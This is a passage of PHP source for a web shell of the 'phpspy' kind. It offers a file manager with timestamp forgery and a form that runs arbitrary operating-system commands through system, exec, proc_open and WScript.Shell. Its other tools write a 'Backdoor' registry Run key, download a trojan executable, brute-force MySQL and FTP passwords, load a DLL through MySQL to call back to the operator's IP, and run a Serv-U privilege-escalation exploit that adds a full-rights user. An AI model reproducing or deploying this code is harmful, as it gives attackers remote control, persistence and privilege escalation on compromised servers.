            echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
            echo "  <td align=\"center\" nowrap>| <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."',' $file ? \\n\\n,!','1')\"></a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\"></a> |</td>\n";
            echo "</tr>\n";
            $dir_i++;
        } else {
            if($file=="..") {
                echo "<tr class=".getrowbg().">\n";
                echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"></a></td>\n";
                echo "</tr>\n";
            }
        }
    }
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
    <td colspan="6" height="5"></td>
</tr>
<?php
// 
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="0"){
        $size=@filesize($filepath);
        $size=$size/1024 ;
        $size= @number_format($size, 3);
        if (@filectime($filepath) == @filemtime($filepath)) {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
        } else {
            $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
            $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
        }
        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
        echo "<tr class=".getrowbg().">\n";
        echo "  <td style=\"padding-left: 5px;\">";
        echo "<INPUT type=checkbox value=$file name=dl[]>";
        echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
        echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
        echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
        echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
        echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
        echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\"></a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\"></a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."',' $file ?','2')\"></a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\"></a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\"></a></td>\n";
        echo "</tr>\n";
        $file_i++;
    }
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "<a href=\"#\" title=\"\" onclick=\"alert('Php\\n\\n,')\">(?)</a>";
else $z = "<a href=\"#\" title=\"\" onclick=\"alert('Php\\n\\n')\">(?)</a>";
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','','','submit').' &nbsp'.$z.'</td><td align="right">'.$dir_i.'  / '.$file_i.' </td></tr></table>','center',getrowbg(),'','','6');

echo "</FORM>\n";
echo "</table>\n";
}// end dir

elseif ($_GET['action'] == "editfile") {
    if(empty($newfile)) {
        $filename="$dir/$editfile";
        $fp=@fopen($filename,"r");
        $contents=@fread($fp, filesize($filename));
        @fclose($fp);
        $contents=htmlspecialchars($contents);
    }else{
        $editfile=$newfile;
        $filename = "$dir/$editfile";
    }
    $action = "?dir=".urlencode($dir)."&editfile=".$editfile;
    $tb->tableheader();
    $tb->formheader($action,'/');
    $tb->tdbody(': '.$tb->makeinput('editfilename',$filename).'  Php: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'php\\n\\nphpphpgzinflate\')"> ');
    $tb->tdbody($tb->maketextarea('filecontent',$contents));
    $tb->makehidden('do','doeditfile');
    $tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "rename") {
    $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
    $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
    $tb->tableheader();
    $tb->formheader($action,'');
    $tb->makehidden('oldname',$dir."/".$nowfile);
    $tb->makehidden('dir',$dir);
    $tb->tdbody(': '.basename($nowfile));
    $tb->tdbody(': '.$tb->makeinput('newname'));
    $tb->makehidden('do','rename');
    $tb->formfooter('1','30');
}//end rename

elseif ($_GET['action'] == "eval") {
    $action = "?dir=".urlencode($dir)."";
    $tb->tableheader();
    $tb->formheader(''.$action.' "target="_blank' ,'php');
    $tb->tdbody($tb->maketextarea('phpcode',$contents));
    $tb->formfooter('1','30');

}
elseif ($_GET['action'] == "fileperm") {
    $action = "?dir=".urlencode($dir)."&file=".$file;
    $tb->tableheader();
    $tb->formheader($action,'');
    $tb->tdbody(' '.$file.' : '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
    $tb->makehidden('file',$file);
    $tb->makehidden('dir',urlencode($dir));
    $tb->makehidden('do','editfileperm');
    $tb->formfooter('1','30');
}//end fileperm

elseif ($_GET['action'] == "newtime") {
    $action = "?dir=".urlencode($dir);
    $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
    $tb->tableheader();
    $tb->formheader($action,'');
    $tb->tdbody(": ".$tb->makeinput('curfile',$file,'readonly')."  : ".$tb->makeinput('tarfile',''),'center','2','30');
    $tb->makehidden('do','domodtime');
    $tb->formfooter('','30');
    $tb->formheader($action,'');
    $tb->tdbody('<br><ul><li> 1901  12  13   20:45:54  2038 1  19   03:14:07<br>( 32 )</li><li>:  01  30 ,  0  24 ,  0  60 !</li></ul>','left');
    $tb->tdbody(': '.$file);
    $tb->makehidden('curfile',$file);
    $tb->tdbody(': '.$tb->makeinput('year','1984','','text','4').'  '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).'  '.$tb->makeinput('data','18','','text','2').'  '.$tb->makeinput('hour','20','','text','2').'  '.$tb->makeinput('minute','00','','text','2').'  '.$tb->makeinput('second','00','','text','2').' ','center','2','30');
    $tb->makehidden('do','modmytime');
    $tb->formfooter('1','30');
}//end newtime

elseif ($_GET['action'] == "shell") {
    $action = "??action=shell&dir=".urlencode($dir);
    $tb->tableheader();
    $tb->tdheader('WebShell Mode');
    if (substr(PHP_OS, 0, 3) == 'WIN') {
        $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
        $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
        echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
        $tb->tdbody('  : '.$tb->makeinput('program',$program).' : '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
        $tb->makehidden('do','programrun');
        echo "</form>\n";
    }
    echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
    if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
    $tb->tdbody(':,.. ');
    $tb->tdbody('proc_openwinnt,,.');
    $tb->tdbody('proc_opencmd:'.$tb->makeinput('cmd',$cmd,'','text','30').'(linux)');
    $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open');
    $tb->tdbody(': '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' : '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
    ?>
<tr class="secondalt">
    <td align="center"><textarea name="textarea" cols="100" rows="25"
        readonly><?php
        if (!empty($_POST['command'])) {
            if ($execfunc=="system") {
                system($_POST['command']);
            } elseif ($execfunc=="passthru") {
                passthru($_POST['command']);
            } elseif ($execfunc=="exec") {
                $result = exec($_POST['command']);
                echo $result;
            } elseif ($execfunc=="shell_exec") {
                $result=shell_exec($_POST['command']);
                echo $result;
            } elseif ($execfunc=="popen") {
                $pp = popen($_POST['command'], 'r');
                $read = fread($pp, 2096);
                echo $read;
                pclose($pp);
            } elseif ($execfunc=="wscript") {
                $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
                $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
                $stdout = $exec->StdOut();
                $stroutput = $stdout->ReadAll();
                echo $stroutput;
            } elseif($execfunc=="proc_open"){
                $descriptorspec = array(
                0 => array("pipe", "r"),
                1 => array("pipe", "w"),
                2 => array("pipe", "w")
                );
                $process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes);
                if (is_resource($process)) {

                    // 
                    fwrite($pipes[0], "".$_POST['command']."\r\n");
                    fwrite($pipes[0], "exit\r\n");
                    fclose($pipes[0]);
                    // 
                    while (!feof($pipes[1])) {
                        echo fgets($pipes[1], 1024);
                    }
                    fclose($pipes[1]);
                    while (!feof($pipes[2])) {
                        echo fgets($pipes[2], 1024);
                    }
                    fclose($pipes[2]);

                    proc_close($process);
                }
            } else {
                system($_POST['command']);
            }
        }
        ?></textarea></td>
</tr>
</form>
</table>
        <?php
}//end shell

elseif ($_GET['action'] == "reg") {
    $action = '?action=reg';
    $regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
    $registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
    $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
    $delregname = $_POST['delregname'];
    $tb->tableheader();
    $tb->formheader($action,'');
    $tb->tdbody(': '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','','','submit'),'center','2','50');
    echo "</form>";

    $tb->formheader($action,'');
    $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
    $tb->tdbody(': '.$tb->makeinput('writeregname',$registre,'','text','56').' : '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' :  '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','','','submit'),'center','2','50');
    echo "</form>";

    $tb->formheader($action,'');
    $tb->tdbody(': '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','','','submit'),'center','2','50');
    echo "</form>";
    $tb->tablefooter();
}//end reg
elseif ($_GET['action'] == "downloads"){
    $action = '?action=dir';
    $tb->tableheader();
    $tb->formheader($action,'http');
    $tb->tdbody('http','center');
    $tb->tdbody(': '.$tb->makeinput('durl','http://google.com/muma.exe','','text','70').'<br>:'.$tb->makeinput('path','./muma.exe','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','','','submit'),'center','1','35');
    echo "</form>";
    $tb->tdbody(',.','center');
    $tb->tablefooter();
}
elseif ($_GET['action'] == "mix"){
    $action = '?action=dir';
    $tb->tableheader();
    $tb->formheader($action,'mix.dll');
    $tb->tdbody('phpspymix.dll','center');
    $tb->tdbody(': '.$tb->makeinput('mixto','./mix.dll','','text','70').''.$tb->makehidden('action','mix').''.$tb->makeinput('','unzip','','submit'),'center','1','35');
    echo "</form>";
    $tb->tablefooter();
}
elseif ($_GET['action'] == "crack"){
    $action = '?action=dir';
    $tb->tableheader();
    $tb->tdbody('','center');
    if($type=="crack"){
        $tb->formheader($action,'mysqlftp <a href="?action=crack">[Mysql]</a>');
        $tb->tdbody('mysql','center');
        $tb->tdbody('host: '.$tb->makeinput('host','localhost','','text','12').'&nbsp'.$tb->makeinput('user','root','','text','12').''.$tb->makehidden('do','crack').'&nbsp;:'.$tb->makeinput('passfile','./password.txt','','text','20').'&nbsp;:'.$tb->makeinput('onetime','100','','text','6').'&nbsp;'.$tb->makeinput('','crack','','submit'),'center','1','35');
        $tb->tdbody('MYSQL:<input type="radio" name="ctype" value="mysql" checked> &nbsp;&nbsp;Ftp:<input type="radio" name="ctype" value="ftp">','center');
        echo "</form>";
        if(getphpcfg("allow_url_fopen")=="Yes") $temp = "";
        $tb->tdbody(''.$temp.'Ftp','center');
        $tb->formheader($action,'');
        $tb->tdbody('','center');
        $tb->tdbody('host: '.$tb->makeinput('host','127.0.0.1',''.$tb->makehidden('do','port').'','text','12').'&nbsp;:'.$tb->makeinput('port',''.$admin[port].'','','text','60').'','center','1','35');
        $tb->tdbody(''.$tb->makeinput('','','','submit').'','center');
        echo "</form>";
        $tb->tdbody('!','center');
        $tb->tableheader();
    }else{
        $tb->formheader("".$action."\" enctype=\"multipart/form-data",'Mysql <a href="?action=crack&type=crack">[Crack]</a>');
        $tb->tdbody('MysqlmysqlWebshell','center');
        $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').'db: '.$tb->makeinput('database','mysql.user','','text','16').'upto: '.$tb->makeinput('uppath','c:/','','text','16').''.$tb->makehidden('action','mysqlup'),'center','1','35');
        $tb->tdbody(': '.$tb->makeinput('upname','','','text','16').': '.$tb->makeinput('upfile','','','file','26').''.$tb->makeinput('','upload','','submit'),'center','1','35');
        echo "</form>";
        $tb->tdbody('file,.','center');
        $tb->formheader($action,'Mysql');
        $tb->tdbody('MysqlWebshell  <input type="checkbox" name="rardown" value="yes" onclick="javascript:alert(\'RAR!\')"> ','center');
        $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').''.$tb->makehidden('action','mysqldown').': '.$tb->makeinput('filename','C:/windows/php.ini','','text','26').''.$tb->makeinput('','download','','submit'),'center','1','35');
        echo "</form>";
        $tb->tdbody('file,.','center');
        $tb->tdbody('WindowsMysqlSystemLinux.','center');
    }
    $tb->tablefooter();
}
elseif ($_GET['action'] == "search"){
    $action = '?dir='.$dir.'';
    $tb->tableheader();
    $tb->formheader($action,'');
    $tb->tdbody('!','center');
    $tb->tdbody(': '.$tb->makeinput('path',''.$nowpath.'','','text','70').'<br>:'.$tb->makeinput('oldkey','','','text','60').''.$tb->makehidden('do','search').'<br> <input type="checkbox" name="type" value="list" onclick="javascript:alert(\',\\n\\n:[/][12/99],.\\n\\n,,!\')"> (!) <br>:<input type="checkbox" name="type2" value="getpath" onclick="javascript:alert(\'..\\n\\n....\\n\\n,,!\')"> '.$tb->makeinput('beline','0','','text','3').' '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('endline','10','','text','3').'... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','','','submit'),'center','1','35');
    echo "</form>";
    $tb->tdbody('.[/]','center');
    $tb->tablefooter();
}
elseif ($_GET['action'] == "proxy") {
    $action = '?action=proxy';
    $tb->tableheader();
    $tb->formheader($action,'','proxyframe');
    $tb->tdbody('<br><ul><li> HTTP ,CSS.</li><li>URL, SQL Injection .</li><li> URL,IP : '.gethostbyname($_SERVER['SERVER_NAME']).'</li></ul>','left');
    $tb->tdbody('URL: '.$tb->makeinput('url','about:blank','','text','100').' '.$tb->makeinput('','','','submit'),'center','1','40');
    $tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe>');
    echo "</form>";
    $tb->tablefooter();
}//end proxy

elseif ($_GET['action'] == "sql") {
    $action = '?action=sql';

    $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
    $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
    $dbpassword = $_POST['dbpassword'];
    $dbname = $_POST['dbname'];
    $sql_query = $_POST['sql_query'];
    if($type=="fun"){
        $sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\\Winnt\\\Mix.dll';
select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/**/
/* nc -vv -l -p 8888*/";
    }
    $tb->tableheader();
    $tb->formheader($action,' SQL ');
    $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','','','submit'));
    $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
    $tb->makehidden('do','query');
    $tb->formfooter('1','30');
}//end sql query

elseif ($_GET['action'] == "sqlbak") {
    $action = '?action=sqlbak';
    $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
    $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
    $dbpassword = $_POST['dbpassword'];
    $dbname = $_POST['dbname'];
    $tb->tableheader();
    $tb->formheader($action,' MySQL ');
    $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','','','submit'));
    @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
    $tables = @mysql_list_tables($dbname);
    while ($table = @mysql_fetch_row($tables)) {
        $cachetables[$table[0]] = $table[0];
    }
    @mysql_free_result($tables);
    if (empty($cachetables)) {
        $tb->tdbody('<b> or </b>');
    } else {
        $tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> :</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download">  ()</td></tr></table>');
        $tb->makehidden('do','backupmysql');
        $tb->formfooter('0','30');
    }
    $tb->tablefooter();
    @mysql_close();
}//end sql backup

elseif ($_GET['action'] == "phpenv") {
    $user = " <a href=\"?action=nowuser\" target=\"_blank\">crush</a> ";
    $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "";
    $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
    if ($dis_func == "") {
        $dis_func = "No";
    }else {
        $dis_func = str_replace(" ","<br>",$dis_func);
        $dis_func = str_replace(",","<br>",$dis_func);
    }
    $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
    $info = array(
    0 => array("php",$user),
    1 => array("",PHP_OS),
    2 => array("",date("Ymd h:i:s",time())),
    3 => array("","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
    4 => array("IP",gethostbyname($_SERVER['SERVER_NAME'])),
    5 => array("",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
    6 => array("",$_SERVER['SERVER_SOFTWARE']),
    7 => array("Web",$_SERVER['SERVER_PORT']),
    8 => array("PHP",strtoupper(php_sapi_name())),
    9 => array("PHP",PHP_VERSION),
    10 => array("",getphpcfg("safemode")),
    11 => array("",$adminmail),
    12 => array("",__FILE__),
    13 => array(" URL  allow_url_fopen",getphpcfg("allow_url_fopen")),
    14 => array(" enable_dl",getphpcfg("enable_dl")),
    15 => array(" display_errors",getphpcfg("display_errors")),
    16 => array(" register_globals",getphpcfg("register_globals")),
    17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
    18 => array(" memory_limit",getphpcfg("memory_limit")),
    19 => array("POST post_max_size",getphpcfg("post_max_size")),
    20 => array(" upload_max_filesize",$upsize),
    21 => array(" max_execution_time",getphpcfg("max_execution_time").""),
    22 => array(" disable_functions",$dis_func),
    23 => array("phpinfo()",$phpinfo),
    24 => array("diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
    25 => array(" GD Library",getfun("imageline")),
    26 => array("IMAP",getfun("imap_close")),
    27 => array("MySQL",getfun("mysql_close")),
    28 => array("SyBase",getfun("sybase_close")),
    29 => array("Oracle",getfun("ora_close")),
    30 => array("Oracle 8 ",getfun("OCILogOff")),
    31 => array("PREL PCRE",getfun("preg_match")),
    32 => array("PDF",getfun("pdf_close")),
    33 => array("Postgre SQL",getfun("pg_close")),
    34 => array("SNMP",getfun("snmpget")),
    35 => array("(Zlib)",getfun("gzclose")),
    36 => array("XML",getfun("xml_set_object")),
    37 => array("FTP",getfun("ftp_login")),
    38 => array("ODBC",getfun("odbc_close")),
    39 => array("Session",getfun("session_start")),
    40 => array("Socket",getfun("fsockopen")),
    );
    $tb->tableheader();
    echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
    $tb->tdbody('<b>PHP</b>','left','1','30','style="padding-left: 5px;"');
    $tb->tdbody('(:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','','','submit'),'left','2','30','style="padding-left: 5px;"');
    $tb->makehidden('do','viewphpvar');
    echo "</form>\n";
    $hp = array(0=> '', 1=> 'PHP', 2=> '');
    for ($a=0;$a<3;$a++) {
        $tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
        ?>
<tr class="secondalt">
    <td>
    <table width="100%" border="0" cellpadding="0" cellspacing="0">
    <?php
    if ($a==0) {
        for($i=0;$i<=12;$i++) {
            echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
        }
    } elseif ($a == 1) {
        for ($i=13;$i<=24;$i++) {
            echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
        }
    } elseif ($a == 2) {
        for ($i=25;$i<=40;$i++) {
            echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
        }
    }
    ?>
    </table>
    </td>
</tr>
    <?php
    }//for
    echo "</table>";
}//end phpenv
elseif($_GET['action'] == "mysqlfun"){
    echo "<table width=\"760\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\"><tr class=\"firstalt\"><td align=\"left\">";
    if($_POST['port'] != "" && $_POST['ip'] != "" && $_POST['function'] != ""  && $_POST['host'] != "" && $_POST['user'] != "")
    {
        $link=@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']);
        if (!$link) {
            echo "<font color=red>Could not connect: ".mysql_error()."</font><br>";
        }
        else{
            echo "<font color=blue>Connected successfully as ".$_POST['user']."</font><br>";
            if(isset($_POST['mixpath'])&&!@file_exists($_POST['mixpath'])){
                echo"<font color=red>Can't find the ".$_POST['mixpath']."</font><br>";
            }
            if(isset($_POST['mixpath'])){
             $dll_path = addslashes($_POST['mixpath']);
             $query="create function ".$_POST['function']." returns integer soname '".$dll_path."';";
             echo (@mysql_query($query, $link)) ? "<font color=blue>Success: ".$query."</font><br>" : "<font color=red>Create function faild!<br>".mysql_error()."</font><br>";
            }
            echo"<font color=red>Now Select Function name of ".$_POST['function']."</font><br>";
            $query="select ".$_POST['function']."('".$_POST['ip']."','".$_POST['port']."');";
            echo (@mysql_query($query, $link)) ? "<font color=blue>Success: ".$query."</font><br>" : "<font color=red>Select Function name of ".$_POST['function']." faild!<br>".mysql_error()."</font><br>";
            mysql_close($link);
        }
    }else{
        echo"";
    }
    echo "</td></tr></table>";
    if($nodll=="yes"){
        $echodll = " <a href=\"#\" title=\"\" onclick=\"alert('addslashes\\\\\\ \\\\\\\\\n\\nnc -vv -l -p mysql')\">(?)</a>&nbsp;    Mixdll:
      <input name=\"mixpath\" type=\"text\" class=\"INPUT\"  value=\"C:\mix.dll\" size=\"50\"> &nbsp;<a href=\"?action=mysqlfun\">(function)</a>";
    }else{
        $echodll = "<FONT color=\"blue\">function</FONT> &nbsp;<a href=\"?action=mysqlfun&nodll=yes\">(function)</a>";
    }
    ?>
<table width="760" border="0" cellpadding="3" cellspacing="1"
    bgcolor="#ffffff">
    <tr class="firstalt">
        <td align="center">mysql_functionmix.dll</td>
    </tr>
    <form action="?action=mysqlfun" method="POST">
    <tr class="secondalt">
        <td align="center"><a href="?action=sql&type=fun">(Func)</a>&nbsp;:
        <input name="port" type="text" class="INPUT" value="5438" size="6">
        IP: <input name="ip" type="text" class="INPUT"
            value="<?=$_SERVER['REMOTE_ADDR']?>"> function: <input
            name="function" type="text" class="INPUT" value="Mixconnect"> &nbsp;<a
            href="?action=mix">(Mix.dll)</a> <br>
        Host : <input name="host" type="text" class="INPUT" value="localhost"
            size="12"> User : <input name="user" type="text" class="INPUT"
            value="root" size="8"> PassWd : <input name="pass" type="text"
            class="INPUT" value=""> <br>
            <?=$echodll?> <? echo"<input name=\"nodll\" value=\"".$nodll."\" type=\"hidden\">";?>
        </td>
    </tr>
    <tr class="secondalt">
        <td align="center"><input name="Submit" type="submit" class="input"
            id="Submit" value=""> <input name="Submit" type="reset"
            class="INPUT" value=""></td>
    </tr>
    </form>
    <tr class="secondalt">
        <td align="center">Remember,Love is a dieing dream....</td>
    </tr>
</table>
            <?
}
elseif($_GET['action'] == "SUExp")
{
    if($_POST['SUPort'] != "" && $_POST['SUUser'] != "" && $_POST['SUPass'] != "")
    {
        echo "<table width=\"760\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\"><tr class=\"firstalt\"><td align=\"left\">";
        $sendbuf = "";
        $recvbuf = "";
        $domain  = "-SETDOMAIN\r\n".
                "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n".
                "-TZOEnable=0\r\n".
                " TZOKey=\r\n";
        $adduser = "-SETUSERSETUP\r\n".
                "-IP=0.0.0.0\r\n".
                "-PortNo=21\r\n".
                "-User=".$user."\r\n".
                "-Password=".$password."\r\n".
                "-HomeDir=c:\\\r\n".
                "-LoginMesFile=\r\n".
                "-Disable=0\r\n".
                "-RelPaths=1\r\n".
                "-NeedSecure=0\r\n".
                "-HideHidden=0\r\n".
                "-AlwaysAllowLogin=0\r\n".
                "-ChangePassword=0\r\n".
                "-QuotaEnable=0\r\n".
                "-MaxUsersLoginPerIP=-1\r\n".
                "-SpeedLimitUp=0\r\n".
                "-SpeedLimitDown=0\r\n".
                "-MaxNrUsers=-1\r\n".
                "-IdleTimeOut=600\r\n".
                "-SessionTimeOut=-1\r\n".
                "-Expire=0\r\n".
                "-RatioUp=1\r\n".
                "-RatioDown=1\r\n".
                "-RatiosCredit=0\r\n".
                "-QuotaCurrent=0\r\n".
                "-QuotaMaximum=0\r\n".
                "-Maintenance=None\r\n".
                "-PasswordType=Regular\r\n".
                "-Ratios=None\r\n".
                " Access=".$part."\|RWAMELCDP\r\n";
        $deldomain="-DELETEDOMAIN\r\n".
                     "-IP=0.0.0.0\r\n".
                     " PortNo=21\r\n";
        $sock = fsockopen("127.0.0.1", $_POST["SUPort"], $errno, $errstr, 10);
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "USER ".$_POST["SUUser"]."\r\n";
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "SITE MAINTENANCE\r\n";
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = $domain;
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = $adduser;
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        echo "**********************************************************<br>";
        if($job!=="adduser"){//
            echo "Starting Exploit ...<br>";
            echo "**********************************************************<br>";
            $exp = fsockopen("127.0.0.1", "21", $errno, $errstr, 10);
            $recvbuf = fgets($exp, 1024);
            echo "<font color=red>Recv: $recvbuf</font><br>";
            $sendbuf = "USER ".$user."\r\n";
            fputs($exp, $sendbuf, strlen($sendbuf));
